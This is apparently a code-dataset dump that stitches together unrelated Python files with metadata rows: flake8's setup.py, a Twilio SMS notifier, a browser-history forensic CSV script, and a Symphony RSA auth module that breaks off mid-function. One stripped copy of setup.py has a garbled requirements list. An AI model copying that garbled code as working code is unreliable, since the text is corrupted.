obj.name = name
response = obj.get_resource(service)
else :
if name and len(name) > 0 :
obj = [feopolicy_binding() for _ in range(len(name))]
for i in range(len(name)) :
obj[i].name = name[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class feopolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.feopolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.feopolicy_binding = [feopolicy_binding() for _ in range(length)]
| true | true |
f723716af0d7e1373054c1309717abfa1d2af972 | 5,495 | py | Python | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Packaging logic for Flake8."""
import functools
import io
import os
import sys
import setuptools
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'src')) # noqa
import flake8
# NOTE(sigmavirus24): When updating these requirements, update them in
# setup.cfg as well.
requires = [
    # We document the reasoning for using ranges here:
    # http://flake8.pycqa.org/en/latest/faq.html#why-does-flake8-use-ranges-for-its-dependencies
    # And in which releases we will update those ranges here:
    # http://flake8.pycqa.org/en/latest/internal/releases.html#releasing-flake8
    "entrypoints >= 0.3.0, < 0.4.0",
    "pyflakes >= 2.1.0, < 2.2.0",
    "pycodestyle >= 2.5.0, < 2.6.0",
    "mccabe >= 0.6.0, < 0.7.0",
]
# Stdlib backports needed only on old interpreters, expressed as PEP 508
# environment markers so modern setuptools resolves them per environment.
extras_require = {
    ":python_version<'3.4'": ['enum34'],
    ":python_version<'3.5'": ['typing'],
    ":python_version<'3.2'": ['configparser'],
}
# setuptools older than 18 cannot evaluate environment markers; fall back
# to appending the backports to install_requires for this interpreter.
if int(setuptools.__version__.split('.')[0]) < 18:
    extras_require = {}
    if sys.version_info < (3, 4):
        requires.append('enum34')
    if sys.version_info < (3, 2):
        requires.append('configparser')
def get_long_description():
    """Generate a long description from the README file."""
    sections = []
    for filename in ('README.rst',):
        with io.open(filename, encoding='utf-8') as handle:
            sections.append(handle.read())
    return '\n\n'.join(sections)
# Entry-point helper: PEP8_PLUGIN('check') expands to the string
# 'pycodestyle.check = pycodestyle:check' used in the flake8.extension
# registry below.
PEP8 = 'pycodestyle'
_FORMAT = '{0}.{1} = {0}:{1}'
PEP8_PLUGIN = functools.partial(_FORMAT.format, PEP8)
setuptools.setup(
    name="flake8",
    license="MIT",
    version=flake8.__version__,
    description="the modular source code checker: pep8, pyflakes and co",
    long_description=get_long_description(),
    author="Tarek Ziade",
    author_email="tarek@ziade.org",
    maintainer="Ian Stapleton Cordasco",
    maintainer_email="graffatcolmingov@gmail.com",
    url="https://gitlab.com/pycqa/flake8",
    package_dir={"": "src"},
    packages=[
        "flake8",
        "flake8.api",
        "flake8.formatting",
        "flake8.main",
        "flake8.options",
        "flake8.plugins",
    ],
    python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
    install_requires=requires,
    extras_require=extras_require,
    # flake8 discovers its own checkers and report formatters through these
    # entry-point registries.
    entry_points={
        'distutils.commands': [
            'flake8 = flake8.main.setuptools_command:Flake8'
        ],
        'console_scripts': [
            'flake8 = flake8.main.cli:main'
        ],
        'flake8.extension': [
            'F = flake8.plugins.pyflakes:FlakesChecker',
            # PEP-0008 checks provided by PyCQA/pycodestyle
            PEP8_PLUGIN('tabs_or_spaces'),
            PEP8_PLUGIN('tabs_obsolete'),
            PEP8_PLUGIN('trailing_whitespace'),
            PEP8_PLUGIN('trailing_blank_lines'),
            PEP8_PLUGIN('maximum_line_length'),
            PEP8_PLUGIN('blank_lines'),
            PEP8_PLUGIN('extraneous_whitespace'),
            PEP8_PLUGIN('whitespace_around_keywords'),
            PEP8_PLUGIN('missing_whitespace_after_import_keyword'),
            PEP8_PLUGIN('missing_whitespace'),
            PEP8_PLUGIN('indentation'),
            PEP8_PLUGIN('continued_indentation'),
            PEP8_PLUGIN('whitespace_before_parameters'),
            PEP8_PLUGIN('whitespace_around_operator'),
            PEP8_PLUGIN('missing_whitespace_around_operator'),
            PEP8_PLUGIN('whitespace_around_comma'),
            PEP8_PLUGIN('whitespace_around_named_parameter_equals'),
            PEP8_PLUGIN('whitespace_before_comment'),
            PEP8_PLUGIN('imports_on_separate_lines'),
            PEP8_PLUGIN('module_imports_on_top_of_file'),
            PEP8_PLUGIN('compound_statements'),
            PEP8_PLUGIN('explicit_line_join'),
            PEP8_PLUGIN('break_after_binary_operator'),
            PEP8_PLUGIN('break_before_binary_operator'),
            PEP8_PLUGIN('comparison_to_singleton'),
            PEP8_PLUGIN('comparison_negative'),
            PEP8_PLUGIN('comparison_type'),
            PEP8_PLUGIN('ambiguous_identifier'),
            PEP8_PLUGIN('bare_except'),
            PEP8_PLUGIN('maximum_doc_length'),
            PEP8_PLUGIN('python_3000_has_key'),
            PEP8_PLUGIN('python_3000_raise_comma'),
            PEP8_PLUGIN('python_3000_not_equal'),
            PEP8_PLUGIN('python_3000_backticks'),
            PEP8_PLUGIN('python_3000_invalid_escape_sequence'),
            PEP8_PLUGIN('python_3000_async_await_keywords'),
        ],
        'flake8.report': [
            'default = flake8.formatting.default:Default',
            'pylint = flake8.formatting.default:Pylint',
            'quiet-filename = flake8.formatting.default:FilenameOnly',
            'quiet-nothing = flake8.formatting.default:Nothing',
        ],
    },
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Framework :: Flake8",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Software Development :: Quality Assurance",
    ],
)
| 36.390728 | 96 | 0.620928 |
import functools
import io
import os
import sys
import setuptools
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'src'))
import flake8
requires = [
2.1.0, < 2.2.0",
"pycodestyle >= 2.5.0, < 2.6.0",
"mccabe >= 0.6.0, < 0.7.0",
]
extras_require = {
":python_version<'3.4'": ['enum34'],
":python_version<'3.5'": ['typing'],
":python_version<'3.2'": ['configparser'],
}
if int(setuptools.__version__.split('.')[0]) < 18:
extras_require = {}
if sys.version_info < (3, 4):
requires.append('enum34')
if sys.version_info < (3, 2):
requires.append('configparser')
def get_long_description():
descr = []
for fname in ('README.rst',):
with io.open(fname, encoding='utf-8') as f:
descr.append(f.read())
return '\n\n'.join(descr)
PEP8 = 'pycodestyle'
_FORMAT = '{0}.{1} = {0}:{1}'
PEP8_PLUGIN = functools.partial(_FORMAT.format, PEP8)
setuptools.setup(
name="flake8",
license="MIT",
version=flake8.__version__,
description="the modular source code checker: pep8, pyflakes and co",
long_description=get_long_description(),
author="Tarek Ziade",
author_email="tarek@ziade.org",
maintainer="Ian Stapleton Cordasco",
maintainer_email="graffatcolmingov@gmail.com",
url="https://gitlab.com/pycqa/flake8",
package_dir={"": "src"},
packages=[
"flake8",
"flake8.api",
"flake8.formatting",
"flake8.main",
"flake8.options",
"flake8.plugins",
],
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
install_requires=requires,
extras_require=extras_require,
entry_points={
'distutils.commands': [
'flake8 = flake8.main.setuptools_command:Flake8'
],
'console_scripts': [
'flake8 = flake8.main.cli:main'
],
'flake8.extension': [
'F = flake8.plugins.pyflakes:FlakesChecker',
PEP8_PLUGIN('tabs_or_spaces'),
PEP8_PLUGIN('tabs_obsolete'),
PEP8_PLUGIN('trailing_whitespace'),
PEP8_PLUGIN('trailing_blank_lines'),
PEP8_PLUGIN('maximum_line_length'),
PEP8_PLUGIN('blank_lines'),
PEP8_PLUGIN('extraneous_whitespace'),
PEP8_PLUGIN('whitespace_around_keywords'),
PEP8_PLUGIN('missing_whitespace_after_import_keyword'),
PEP8_PLUGIN('missing_whitespace'),
PEP8_PLUGIN('indentation'),
PEP8_PLUGIN('continued_indentation'),
PEP8_PLUGIN('whitespace_before_parameters'),
PEP8_PLUGIN('whitespace_around_operator'),
PEP8_PLUGIN('missing_whitespace_around_operator'),
PEP8_PLUGIN('whitespace_around_comma'),
PEP8_PLUGIN('whitespace_around_named_parameter_equals'),
PEP8_PLUGIN('whitespace_before_comment'),
PEP8_PLUGIN('imports_on_separate_lines'),
PEP8_PLUGIN('module_imports_on_top_of_file'),
PEP8_PLUGIN('compound_statements'),
PEP8_PLUGIN('explicit_line_join'),
PEP8_PLUGIN('break_after_binary_operator'),
PEP8_PLUGIN('break_before_binary_operator'),
PEP8_PLUGIN('comparison_to_singleton'),
PEP8_PLUGIN('comparison_negative'),
PEP8_PLUGIN('comparison_type'),
PEP8_PLUGIN('ambiguous_identifier'),
PEP8_PLUGIN('bare_except'),
PEP8_PLUGIN('maximum_doc_length'),
PEP8_PLUGIN('python_3000_has_key'),
PEP8_PLUGIN('python_3000_raise_comma'),
PEP8_PLUGIN('python_3000_not_equal'),
PEP8_PLUGIN('python_3000_backticks'),
PEP8_PLUGIN('python_3000_invalid_escape_sequence'),
PEP8_PLUGIN('python_3000_async_await_keywords'),
],
'flake8.report': [
'default = flake8.formatting.default:Default',
'pylint = flake8.formatting.default:Pylint',
'quiet-filename = flake8.formatting.default:FilenameOnly',
'quiet-nothing = flake8.formatting.default:Nothing',
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Framework :: Flake8",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Quality Assurance",
],
)
| true | true |
f72371fab6acdaffc73d69c8446bc7446f1ef5eb | 1,603 | py | Python | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 238 | 2018-12-20T07:48:43.000Z | 2022-03-31T19:06:10.000Z | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 62 | 2020-08-26T20:26:36.000Z | 2020-08-26T20:28:47.000Z | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 85 | 2018-12-19T12:45:31.000Z | 2022-03-29T19:09:48.000Z | # -*- coding: utf-8 -*-
u"""Twilio module.
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jan 26 2019
Version: 1.1
"""
from twilio.rest import Client
class Twilio():
    """Send SMS notifications through the Twilio REST API."""

    def __init__(self, cred):
        """Store Twilio credentials and build the REST client.

        Args:
            cred (dict): Twilio credentials with keys ``twilio_sid``,
                ``twilio_token``, ``twilio_from`` and ``twilio_to``.
        """
        self.account_sid = cred['twilio_sid']
        self.account_token = cred['twilio_token']
        self.twilio_from = cred['twilio_from']
        self.twilio_to = cred['twilio_to']
        self.client = Client(self.account_sid, self.account_token)

    @staticmethod
    def generatemessage(msg):
        """Return the message body to send, as a string.

        BUG FIX: the original docstring claimed the current CPU time was
        appended to the message, but the implementation only stringifies
        ``msg``; the docstring now matches the code.

        Args:
            msg: Message to send (any object).

        Returns:
            str: ``msg`` converted to a string.
        """
        return str(msg)

    def notify(self, msg):
        """Send ``msg`` as an SMS via Twilio.

        API errors are caught and printed; this method never raises.

        Args:
            msg: Message to send.

        Returns:
            None
        """
        try:
            self.client.messages.create(
                body=self.generatemessage(msg),
                from_=self.twilio_from,
                to=self.twilio_to
            )
        except Exception as e:
            print("[!] Error in sending SMS: ", str(e))
            return
        print("[+] SMS notification sent.")
        return
| 21.958904 | 73 | 0.495321 |
from twilio.rest import Client
class Twilio():
    # Thin wrapper around the Twilio REST client used to push SMS alerts.

    def __init__(self, cred):
        # Pull credentials out of the config dict and build the client.
        # Expected keys: twilio_sid, twilio_token, twilio_from, twilio_to.
        self.account_sid = cred['twilio_sid']
        self.account_token = cred['twilio_token']
        self.twilio_from = cred['twilio_from']
        self.twilio_to = cred['twilio_to']
        self.client = Client(self.account_sid, self.account_token)

    @staticmethod
    def generatemessage(msg):
        # Coerce the payload to a plain string before sending.
        message = (str(msg))
        return message

    def notify(self, msg):
        # Send the SMS; API failures are reported on stdout, never raised.
        try:
            self.client.messages \
                .create(
                    body=self.generatemessage(msg),
                    from_=self.twilio_from,
                    to=self.twilio_to
                )
        except Exception as e:
            print("[!] Error in sending SMS: ", str(e))
            return
        print("[+] SMS notification sent.")
        return
return
| true | true |
f72372652df9b3e3b99085021eb6e8e17b451670 | 4,093 | py | Python | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Browsing History to csv
# by:maTWed
# updated: 4/5/2022
# Created for internal use do to all the browsing history investigation
# Instructions: Copy Chrome & Firefox browsing DB to the directory of this script
# Or use 'get_browsing_history.sh' to collect the history and place them in this script's directory.
# TODO: Creat a function that connects to the smb share and copies the
# browsing files to local machine then gathers the data.
import os, time, datetime, operator, string, sqlite3, csv, argparse
def firefox_history():
    """Read Firefox's places.sqlite and append one CSV line per visit.

    Relies on module globals ``fox_db``, ``username`` and ``timeline_csv``.

    BUG FIX: the original opened the database twice and never closed
    either connection; it also re-scanned all of moz_places for every
    visit (O(n*m)).  One connection is now used and closed, and URLs are
    looked up through a dict built once.
    """
    if not os.path.exists(fox_db):
        print("[-] Firefox DB not found!")
        return
    db = sqlite3.connect(fox_db)
    try:
        cursor = db.cursor()
        cursor.execute("SELECT * from moz_places")
        url_data = cursor.fetchall()
        cursor.execute("SELECT * from moz_historyvisits")
        browsing_data = cursor.fetchall()
    finally:
        db.close()
    # Map moz_places rowid -> url once instead of rescanning per visit.
    urls_by_id = {row[0]: row[1] for row in url_data}
    for record in browsing_data:
        visit_url = urls_by_id.get(record[2])
        if visit_url is None:
            continue  # orphan visit row: no matching moz_places entry
        # PRTime epoch (microseconds since 1970-01-01); hours=-4 is a
        # hardcoded local-time offset -- NOTE(review): not DST-safe,
        # confirm this is intentional.
        visit_time = str(datetime.datetime(1970, 1, 1)
                         + datetime.timedelta(microseconds=record[3], hours=-4))
        visit_time = visit_time[:-7]  # strip trailing ".ffffff" microseconds
        visit_line = visit_time + "," + "Website visited (Firefox)" + "," \
            + "," + visit_url + "," + username + "," + visit_time + "," \
            + "Firefox history" + "," + "\places.sqlite" + "\n"
        timeline_csv.write(visit_line)
    print("[+] FIREFOX HISTORY ADDED TO THE TIMELINE. \n")
def chrome_history():
    """Read Chrome's History SQLite DB and append one CSV line per URL.

    Relies on module globals ``chrome_db``, ``username`` and
    ``timeline_csv``.

    BUG FIX: the original never closed the database connection.
    """
    if not os.path.exists(chrome_db):
        print("[-] Chrome DB not found!")
        return
    db = sqlite3.connect(chrome_db)
    try:
        cursor = db.cursor()
        cursor.execute("SELECT * from urls")
        browsing_data = cursor.fetchall()
    finally:
        db.close()
    for record in browsing_data:
        # Chrome timestamps are microseconds since 1601-01-01 (WebKit epoch).
        visit_time = str(datetime.datetime(1601, 1, 1)
                         + datetime.timedelta(microseconds=record[5]))
        if visit_time[:4] == "1601":
            # last_visit_time of 0 -> URL never actually visited; skip it.
            continue
        visit_time = str(datetime.datetime.strptime(
            visit_time, "%Y-%m-%d %H:%M:%S.%f"))
        visit_time = visit_time[:-7]  # strip microseconds
        visit_title = record[2].replace(",", "")  # commas would break the CSV
        visit_url = record[1]
        visit_line = visit_time + "," + "Website visited (Chrome)" + "," \
            + visit_title + "," + visit_url + "," + username + "," \
            + visit_time + "," + "Google Chrome history" + "," \
            + "History" + "\n"
        timeline_csv.write(visit_line)
    print("[+] CHROME HISTORY ADDED TO THE TIMELINE.\n")
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Open Firefox & Chrome browsing history databases and create a csv with the data')
    parser.add_argument('-u', '--username', type=str, metavar='', help='Username of the data owner')
    args = parser.parse_args()

    # Variables
    username = args.username
    # BUG FIX: renamed `dir` -> `work_dir`; `dir` shadowed the builtin.
    work_dir = os.getcwd()
    chrome_db = work_dir + r"/History"
    fox_db = work_dir + r"/places.sqlite"
    timeline_csv = open("timeline.csv", "a")

    # Function Calls
    firefox_history()
    chrome_history()
    timeline_csv.close()

    # Re-read the collected rows, sort newest-first, and rewrite the
    # file with a header row on top.
    # BUG FIX: open csv files with newline="" as the csv module requires
    # (prevents blank lines between rows on Windows).
    with open("timeline.csv", newline="") as f:
        reader = csv.reader(f, delimiter=",")
        sorted_timeline = sorted(reader, key=operator.itemgetter(0),
                                 reverse=True)
    with open("timeline.csv", "w", newline="") as f:
        fileWriter = csv.writer(f, delimiter=",")
        header_row = "Artefact Timestamp", "Action", "Filename", "Full Path", \
            "User", "File Accessed", "Source", "Source File"
        fileWriter.writerow(header_row)
        for row in sorted_timeline:
            fileWriter.writerow(row)
| 37.550459 | 131 | 0.576839 |
# TODO: Creat a function that connects to the smb share and copies the
# browsing files to local machine then gathers the data.
import os, time, datetime, operator, string, sqlite3, csv, argparse
def firefox_history():
    # Parse Firefox's places.sqlite and append one CSV line per visit.
    # Uses module globals: fox_db, username, timeline_csv.
    if not os.path.exists(fox_db):
        print("[-] Firefox DB not found!")
    else:
        db = sqlite3.connect(fox_db)
        cursor = db.cursor()
        cursor.execute("SELECT * from moz_places")
        url_data = (cursor.fetchall())
        # NOTE(review): the DB is opened a second time here; a single
        # connection would suffice and neither is ever closed.
        db = sqlite3.connect(fox_db)
        cursor = db.cursor()
        cursor.execute("SELECT * from moz_historyvisits")
        browsing_data = (cursor.fetchall())
        for record in browsing_data:
            url_reference = record[2]  # FK into moz_places
            for saved_url in url_data:
                if saved_url[0] == url_reference:
                    visit_url = saved_url[1]
                    # PRTime epoch (us since 1970); hours=-4 looks like a
                    # hardcoded local-time offset -- TODO confirm intent.
                    visit_time = str(datetime.datetime(1970, 1, 1)
                                     + datetime.timedelta(microseconds=record[3], hours=-4))
                    visit_time = visit_time[:-7]  # drop microseconds
                    visit_line = visit_time + "," + "Website visited (Firefox)" + "," \
                        + "," + visit_url + "," + username + "," + visit_time + "," \
                        + "Firefox history" + "," + "\places.sqlite" + "\n"
                    timeline_csv.write(visit_line)
        print("[+] FIREFOX HISTORY ADDED TO THE TIMELINE. \n")
def chrome_history():
    # Parse Chrome's History DB and append one CSV line per stored URL.
    # Uses module globals: chrome_db, username, timeline_csv.
    if not os.path.exists(chrome_db):
        print("[-] Chrome DB not found!")
    else:
        db = sqlite3.connect(chrome_db)  # NOTE(review): never closed
        cursor = db.cursor()
        cursor.execute("SELECT * from urls")
        browsing_data = (cursor.fetchall())
        for record in browsing_data:
            # Chrome timestamps are microseconds since 1601-01-01.
            visit_time = str(datetime.datetime(1601, 1, 1) \
                + datetime.timedelta(microseconds=record[5]))
            if visit_time[:4] == "1601":
                # last_visit_time of 0 -> URL never actually visited
                pass
            else:
                visit_time = str(datetime.datetime.strptime(
                    visit_time, "%Y-%m-%d %H:%M:%S.%f"))
                visit_time = visit_time[:-7]  # drop microseconds
                visit_title = record[2]
                visit_title = visit_title.replace(",", "")  # keep CSV intact
                visit_url = record[1]
                visit_line = visit_time + "," + "Website visited (Chrome)" + "," \
                    + visit_title + "," + visit_url + "," + username + "," \
                    + visit_time + "," + "Google Chrome history" + "," \
                    + "History" + "\n"
                timeline_csv.write(visit_line)
        print("[+] CHROME HISTORY ADDED TO THE TIMELINE.\n")
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Open Firefox & Chrome browsing history databases and create a csv with the data')
    parser.add_argument('-u', '--username', type=str, metavar='', help='Username of the data owner')
    args = parser.parse_args()
    # Variables
    username = args.username
    dir = os.getcwd()  # NOTE(review): shadows the builtin `dir`
    chrome_db = dir + r"/History"
    fox_db = dir + r"/places.sqlite"
    timeline_csv = open("timeline.csv", "a")
    # Function Calls
    firefox_history()
    chrome_history()
    timeline_csv.close()
    # creating the csv & adding column headers:
    # re-read everything, sort rows newest-first, rewrite with a header.
    with open("timeline.csv") as f:
        timeline_csv = csv.reader(f, delimiter=",")
        sorted_timeline = sorted(timeline_csv, key=operator.itemgetter(0),
                                 reverse=True)
    with open("timeline.csv", "w") as f:
        fileWriter = csv.writer(f, delimiter=",")
        header_row = "Artefact Timestamp", "Action", "Filename", "Full Path", \
            "User", "File Accessed", "Source", "Source File"
        fileWriter.writerow(header_row)
        for row in sorted_timeline:
            fileWriter.writerow(row)
| true | true |
f723729324811ada91d71604306624d23a7791f7 | 129 | py | Python | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | n = int(input('Digite um número: '))
n1 = n + 1
n2 = n - 1
print('O antecessor de {} é {} e o sucessor é {}'.format(n, n2, n1)) | 21.5 | 68 | 0.55814 | n = int(input('Digite um número: '))
n1 = n + 1
n2 = n - 1
print('O antecessor de {} é {} e o sucessor é {}'.format(n, n2, n1)) | true | true |
f723736c92eaaee1e47d1c8e3f0f9f8004962057 | 5,581 | py | Python | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | import json
import requests
import datetime
import time
import logging
from .auth_endpoint_constants import auth_endpoint_constants
from requests import Session
from jose import jwt
from ..clients.api_client import APIClient
from ..exceptions.UnauthorizedException import UnauthorizedException
from ..exceptions.MaxRetryException import MaxRetryException
class SymBotRSAAuth(APIClient):
    """RSA (public-key) authentication against a Symphony pod and key manager."""

    def __init__(self, config):
        """Set up authenticated HTTP sessions, including proxies/truststore.

        Args:
            config: Configuration object; ``config.data`` holds all RSA
                settings (hosts, proxy objects, truststore path, private
                key path, bot username).
        """
        self.config = config
        self.last_auth_time = 0   # ms timestamp of the last auth attempt
        self.auth_retries = 0     # consecutive failed attempts
        self.session_token = None
        self.key_manager_token = None
        self.auth_session = requests.Session()
        self.key_manager_auth_session = requests.Session()
        self.auth_session.proxies.update(self.config.data['podProxyRequestObject'])
        self.key_manager_auth_session.proxies.update(self.config.data['keyManagerProxyRequestObject'])
        if self.config.data['truststorePath']:
            logging.debug('truststore being added to requests library')
            self.auth_session.verify = self.config.data['truststorePath']
            self.key_manager_auth_session.verify = self.config.data['truststorePath']

    def get_session_token(self):
        """Return the session token (None before authentication)."""
        return self.session_token

    def get_key_manager_token(self):
        """Return the key manager token (None before authentication)."""
        return self.key_manager_token

    def authenticate(self):
        """Fetch both the session and key manager tokens.

        Re-authentication is throttled: if the last attempt was less than
        WAIT_TIME ms ago, sleep TIMEOUT seconds and retry recursively.

        Raises:
            MaxRetryException: after too many failed attempts.
        """
        logging.debug('RSA Auth/authenticate()')
        try:
            now_ms = int(round(time.time() * 1000))
            if (self.last_auth_time == 0) or \
                    (now_ms - self.last_auth_time >= auth_endpoint_constants['WAIT_TIME']):
                logging.debug('RSA Auth/authenticate() --> needed to authenticate')
                self.last_auth_time = now_ms
                self.session_authenticate()
                self.key_manager_authenticate()
            else:
                logging.debug('Retry authentication in 30 seconds.')
                time.sleep(auth_endpoint_constants['TIMEOUT'])
                self.authenticate()
        except MaxRetryException as e:
            logging.exception(e)
            raise MaxRetryException

    def create_jwt(self):
        """Create a short-lived JWT signed with the bot's RSA private key.

        BUG FIX: the original called ``f.close()`` after the ``with``
        block, which is redundant -- the context manager already closed
        the file.

        Returns:
            str: JWT (RS512) valid for 5 * 58 s, just under Symphony's
            290-second limit.
        """
        logging.debug('RSA_auth/getJWT() function started')
        with open(self.config.data['botRSAPath'], 'r') as f:
            private_key = ''.join(f.readlines())
        expiration_date = int(datetime.datetime.now(datetime.timezone.utc)
                              .timestamp() + (5 * 58))
        payload = {
            'sub': self.config.data['botUsername'],
            'exp': expiration_date
        }
        return jwt.encode(payload, private_key, algorithm='RS512')

    def session_authenticate(self):
        """Obtain the pod session token, retrying on failure.

        Raises:
            MaxRetryException: when MAX_RSA_RETRY consecutive attempts fail.
        """
        logging.debug('RSA_auth/get_session_token() function started')
        data = {
            'token': self.create_jwt()
        }
        url = self.config.data['sessionAuthHost'] + '/login/pubkey/authenticate'
        response = self.auth_session.post(url, json=data)
        if response.status_code != 200:
            self.auth_retries += 1
            if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
                raise MaxRetryException('bot failed to authenticate more than 5 times.')
            logging.debug('RSA_auth/get_session_token() function failed: {}'.format(
                response.status_code)
            )
            time.sleep(auth_endpoint_constants['TIMEOUT'])
            self.session_authenticate()
        else:
            data = json.loads(response.text)
            logging.debug('RSA/session token success')
            self.session_token = data['token']
            self.auth_retries = 0

    def key_manager_authenticate(self):
        """Obtain the key manager token, retrying on failure.

        Raises:
            MaxRetryException: when MAX_RSA_RETRY consecutive attempts fail.
        """
        logging.debug('RSA_auth/get_keyauth()')
        data = {
            'token': self.create_jwt()
        }
        url = self.config.data['keyAuthHost'] + '/relay/pubkey/authenticate'
        response = self.key_manager_auth_session.post(url, json=data)
        if response.status_code != 200:
            self.auth_retries += 1
            if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
                raise MaxRetryException('bot failed to authenticate more than 5 times.')
            logging.debug('RSA_auth/get_key_manager_authenticate() function failed: {}'.format(
                response.status_code)
            )
            time.sleep(auth_endpoint_constants['TIMEOUT'])
            self.key_manager_authenticate()
        else:
            data = json.loads(response.text)
            logging.debug('RSA/key manager token success')
            self.key_manager_token = data['token']
            self.auth_retries = 0
| 38.756944 | 115 | 0.612614 | import json
import requests
import datetime
import time
import logging
from .auth_endpoint_constants import auth_endpoint_constants
from requests import Session
from jose import jwt
from ..clients.api_client import APIClient
from ..exceptions.UnauthorizedException import UnauthorizedException
from ..exceptions.MaxRetryException import MaxRetryException
class SymBotRSAAuth(APIClient):
    """RSA (public-key) authentication for a Symphony bot.

    Fetches and caches a pod session token and a key manager token.
    """

    def __init__(self, config):
        # config.data carries all RSA settings: proxy objects, truststore
        # path, private-key path, bot username and auth hosts.
        self.config = config
        self.last_auth_time = 0   # ms timestamp of the last auth attempt
        self.auth_retries = 0     # consecutive failed attempts
        self.session_token = None
        self.key_manager_token = None
        self.auth_session = requests.Session()
        self.key_manager_auth_session = requests.Session()
        self.auth_session.proxies.update(self.config.data['podProxyRequestObject'])
        self.key_manager_auth_session.proxies.update(self.config.data['keyManagerProxyRequestObject'])
        if self.config.data['truststorePath']:
            logging.debug('truststore being added to requests library')
            self.auth_session.verify = self.config.data['truststorePath']
            self.key_manager_auth_session.verify = self.config.data['truststorePath']

    def get_session_token(self):
        # None until session_authenticate() has succeeded.
        return self.session_token

    def get_key_manager_token(self):
        # None until key_manager_authenticate() has succeeded.
        return self.key_manager_token

    def authenticate(self):
        """Fetch both tokens, throttled to one attempt per WAIT_TIME ms."""
        logging.debug('RSA Auth/authenticate()')
        try:
            if (self.last_auth_time == 0) or \
                    (int(round(time.time() * 1000) - self.last_auth_time >= auth_endpoint_constants['WAIT_TIME'])):
                logging.debug('RSA Auth/authenticate() --> needed to authenticate')
                self.last_auth_time = int(round(time.time() * 1000))
                self.session_authenticate()
                self.key_manager_authenticate()
            else:
                # Too soon since the last attempt: wait, then recurse.
                logging.debug('Retry authentication in 30 seconds.')
                time.sleep(auth_endpoint_constants['TIMEOUT'])
                self.authenticate()
        except MaxRetryException as e:
            logging.exception(e)
            raise MaxRetryException

    def create_jwt(self):
        """Build a JWT signed (RS512) with the bot's RSA private key.

        Expires in 5 * 58 s, just under Symphony's 290-second limit.
        """
        logging.debug('RSA_auth/getJWT() function started')
        with open(self.config.data['botRSAPath'], 'r') as f:
            content = f.readlines()
        private_key = ''.join(content)
        expiration_date = int(datetime.datetime.now(datetime.timezone.utc)
                              .timestamp() + (5*58))
        payload = {
            'sub': self.config.data['botUsername'],
            'exp': expiration_date
        }
        encoded = jwt.encode(payload, private_key, algorithm='RS512')
        f.close()  # NOTE(review): redundant -- the `with` block already closed f
        return encoded

    def session_authenticate(self):
        """POST a JWT to the pod to obtain the session token.

        Retries after TIMEOUT seconds; raises MaxRetryException after
        MAX_RSA_RETRY consecutive failures.
        """
        logging.debug('RSA_auth/get_session_token() function started')
        data = {
            'token': self.create_jwt()
        }
        url = self.config.data['sessionAuthHost']+'/login/pubkey/authenticate'
